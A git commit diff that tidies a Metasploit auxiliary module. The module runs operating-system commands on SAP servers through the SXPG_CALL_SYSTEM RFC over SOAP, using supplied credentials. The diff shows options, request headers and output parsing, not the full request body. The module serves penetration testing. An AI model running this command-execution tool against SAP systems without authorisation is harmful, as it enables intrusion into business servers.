made requested changes

nmonkee · nmonkee · commit 308eee7c4fed · 2012-11-14T23:00:45.000Z
diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
@@ -6,13 +6,13 @@
 ##
 
 ##
-# This module is based on, inspired by, or is a port of a plugin available in 
-# the Onapsis Bizploit Opensource ERP Penetration Testing framework - 
+# This module is based on, inspired by, or is a port of a plugin available in
+# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
 # http://www.onapsis.com/research-free-solutions.php.
-# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts
+# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
 # in producing the Metasploit modules and was happy to share his knowledge and
-# experience - a very cool guy. I'd also like to thank Chris John Riley, 
-# Ian de Villiers and Joris van de Vis who have Beta tested the modules and 
+# experience - a very cool guy. I'd also like to thank Chris John Riley,
+# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
 # provided excellent feedback. Some people just seem to enjoy hacking SAP :)
 ##
 
@@ -23,29 +23,29 @@ class Metasploit4 < Msf::Auxiliary
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Auxiliary::Report
 	include Msf::Auxiliary::Scanner
-	
+
 	def initialize
 		super(
-			'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM',
-			'Version' => '$Revision',
+			'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM Command Exec',
 			'Description' => %q{
-				This module makes use of the SXPG_CALL_SYSTEM Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
+				This module makes use of the SXPG_CALL_SYSTEM Remote Function Call (via SOAP)
+				to execute OS commands as configured in SM69.
 				},
-			'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+			'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]],
 			'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
 			'License' => BSD_LICENSE
-			)      
+			)
 		register_options(
 			[
 				OptString.new('CLIENT', [true, 'Client', nil]),
 				OptString.new('USERNAME', [true, 'Username', nil]),
 				OptString.new('PASSWORD', [true, 'Password', nil]),
 				OptString.new('CMD', [true, 'Command to be executed', nil]),
 				OptString.new('PARAM', [false, 'Additional parameters', nil]),
-				OptEnum.new('OS', [true, 'Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']]),
+				OptEnum.new('OS', [true, 'Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']])
 			], self.class)
 	end
-	
+
 	def run_host(ip)
 		os = datastore['OS']
 		data = '<?xml version="1.0" encoding="utf-8" ?>'
@@ -75,10 +75,10 @@ def run_host(ip)
 					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
 					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
 					'Authorization' => 'Basic ' + user_pass,
-					'Content-Type' => 'text/xml; charset=UTF-8',
+					'Content-Type' => 'text/xml; charset=UTF-8'
 					}
 				}, 45)
-			if (res and res.code != 500 and res.code != 200)
+			if res and res.code != 500 and res.code != 200
 				# to do - implement error handlers for each status code, 404, 301, etc.
 				print_error("[SAP] #{ip}:#{rport} - something went wrong!")
 				return
@@ -93,27 +93,26 @@ def run_host(ip)
 						'Indent' => 1,
 						'Columns' =>["Output",]
 						)
-				response = res.body
+				response = res.body if res
 				if response =~ /faultstring/
-					error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
-					sucess = false
+					error = response.scan(%r{<faultstring>(.*?)</faultstring>})
+					success = false
 				end
 				output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
 				for i in 0..output.length-1
 					saptbl << [output[i]]
 				end
 			end
-			rescue ::Rex::ConnectionError
-				print_error("[SAP] #{ip}:#{rport} - Unable to connect")
-				return
-			end
-			if success == true
-				print(saptbl.to_s)
-			end
-			if sucess == false
-				for i in 0..error.length-1
-					print_error("[SAP] #{ip}:#{rport} - error #{error[i]}")
-				end
+		rescue ::Rex::ConnectionError
+			print_error("[SAP] #{ip}:#{rport} - Unable to connect")
+			return false
+		end
+		if success
+			print(saptbl.to_s)
+		elsif !success
+			0.upto(error.length-1) do |i|
+				print_error("[SAP] #{ip}:#{rport} - error #{error[i]}")
 			end
 		end
 	end
+end
